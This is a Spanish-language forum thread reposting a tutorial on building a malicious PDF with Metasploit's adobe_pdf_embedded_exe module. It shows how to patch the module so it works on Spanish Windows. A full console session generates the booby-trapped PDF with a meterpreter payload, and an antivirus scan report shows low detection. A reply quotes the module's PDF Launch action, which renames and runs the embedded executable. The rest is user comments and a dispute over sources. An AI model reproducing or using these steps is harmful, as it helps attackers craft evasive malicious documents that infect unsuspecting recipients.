Incrustar ejecutable dentro de un archivo de Adobe PDF
(http://www.loromerogolf.es/residencial/_images_/filetypes/icon_pdf.png)
[Metasploit By: Shell Root]
Retomando un poco lo que es la herramienta '
Metasploit', encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.
Descripción del Exploit| Ubicación: | /windows/fileformat/adobe_pdf_embedded_exe |
| Nombre: | Adobe PDF Embedded EXE Social Engineering |
| Versión: | 0 |
| Plataforma: | Windows |
| Licencia: | Metasploit Framework License (BSD) |
| Rango: | Excelente |
| Proporciando por: | Colin Ames <amesc@attackresearch.com> |
| Objetivos disponibles: | Adobe Reader v8.x, v9.x (Windows XP SP3 English) |
| Descripción: | Este módulo del Metasploit incorpora una carga de un archivo PDF existente. |
Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles
(Windows XP ... English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.
Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea
232 del exploit, donde reemplazamos este código:
232. dirs = [ "Desktop", "My Documents", "Documents" ]por este:
232. dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos"]Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro
PoC!
Abrimos la consola del
Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf "infectado".
root@bt:/opt/metasploit3/msf3# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
=[ svn r9040 updated today (2010.04.07)
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME yes The Input PDF filename.
OUTPUTPATH ./data/exploits/ no The location to output the file.
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started bind handler
[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing Successful.
[*] Using '/root/cmd.exe' as payload...
[*] Creating 'PoC_PDF_EXE.pdf' file...
[*] Generated output file /root/PoC_PDF_EXE.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.
Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.
(http://img251.imageshack.us/img251/1477/poc.th.png) (http://img251.imageshack.us/img251/1477/poc.png)
Miremos que nos dice el Scanner de
NoVirusThanks:
CitarFile Info
Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf (http://scanner.novirusthanks.org/analysis/23d92e4f9b132150d002d014eb772529/UG9DX1BERl9FWEUucGRm/)
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10%)
Status: INFECTED
Detections
a-squared - -
Avast - JS:Pdfka-XN [Expl]
AVG - -
Avira AntiVir - -
BitDefender - Exploit.PDF-Dropper.Gen
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
Zoner - -
Scan report generated by NoVirusThanks.org (http://novirusthanks.org)
Fuente: http://shellrootsecurity.blogspot.com/2010/04/metasploit-incrustar-ejecutable-dentro.html
Buenísima la modificación para que funcione en un spanish!!
Como siempre, bestial de lo mejorcito.
Saludos
buen aporte :rolleyes: :rolleyes: ;-)
disculpen mi ingnorancia, pues comienzo a usarlo...
pero...
como llego a esa linea de xploit?
sl2..
buenisismo el tuto..
Emmm dentro de la carpeta /opt/metasploit3/msf3/modules/exploits/windows/fileformat/, buscas el archivo adobe_pdf_embedded_exe.rb
PD: Identifica la diferencia entre Exploit y Xploit.
http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html (http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html)
:¬¬
Ahora dirás que es un Copy/Paste?
Nueva linea a modificar 97 (http://www.metasploit.com/redmine/projects/framework/repository/revisions/7881/entry/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb#L97)
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
Nio digo que sea un Copy and Paste.
Ahora, se mas prudente y no saques mucho pecho despues de lo que hicistes.
Se de sobra que usas fuentes externas para elaborar tus tutoriales; no vendria nada mal si las pusieras.
Saludos.
jejejejje? :P
Cita de: Alex@ShellRoot en 12 Abril 2010, 19:25 PM
Emmm dentro de la carpeta /opt/metasploit3/msf3/modules/exploits/windows/fileformat/, buscas el archivo adobe_pdf_embedded_exe.rb
PD: Identifica la diferencia entre Exploit y Xploit.
Muchas Gracias..
muy buen aporte, te garantizo que leere acerca de las diferencias..
Sl2 :)